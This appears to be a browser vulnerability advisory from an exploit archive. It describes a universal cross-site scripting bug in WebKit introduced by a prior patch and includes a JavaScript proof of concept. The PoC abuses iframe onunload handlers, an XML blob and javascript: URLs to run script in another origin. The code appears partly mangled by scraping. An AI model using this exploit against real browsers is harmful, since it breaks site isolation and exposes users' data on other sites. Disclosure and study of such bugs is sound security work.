WebKit Patch #1110 Universal Cross Site Scripting

The WebKit #1110 patch created a universal cross site scripting vulnerability.

MD5 | 8098c3fb457b2945a51eccf43fe835a4

 WebKit: UXSS: the patch of #1110 made another bug 

Here's the patch of #1110.
<a href="https://trac.webkit.org/changeset/212218/trunk/Source/WebCore/dom/ContainerNode.cpp" title="" class="" rel="nofollow">https://trac.webkit.org/changeset/212218/trunk/Source/WebCore/dom/ContainerNode.cpp</a>

void ContainerNode::parserRemoveChild(Node& oldChild)
disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)

(a) was added for the fix. But in |disconnectSubframesIfNeeded|, which fires unload event handlers, |oldChild|'s parent may be replaced. As a result, subframes of |oldChild| will be not detached.


d = document.querySelector('div');
p = document.querySelector('p');
p.parentElement.appendChild(document.createElement('iframe')).contentWindow.onunload = () => {

f = p.appendChild(document.createElement('iframe'));
f.onload = () => {
f.onload = null;

document.documentElement.innerHTML = '';

f.src = 'javascript:alert(location)';

let xml = `
<svg xmlns="<a href="http://www.w3.org/2000/svg" title="" class="" rel="nofollow">http://www.w3.org/2000/svg</a>">
document.documentElement.appendChild(document.createElementNS('<a href="http://www.w3.org/1999/xhtml" title="" class="" rel="nofollow">http://www.w3.org/1999/xhtml</a>', 'iframe')).contentWindow.onunload = () => {
</sc` + `ript>
<element a="1" a="2" />

let tmp = document.documentElement.appendChild(document.createElement('iframe'));
tmp.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));
f.src = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Found by: lokihardt

Related Posts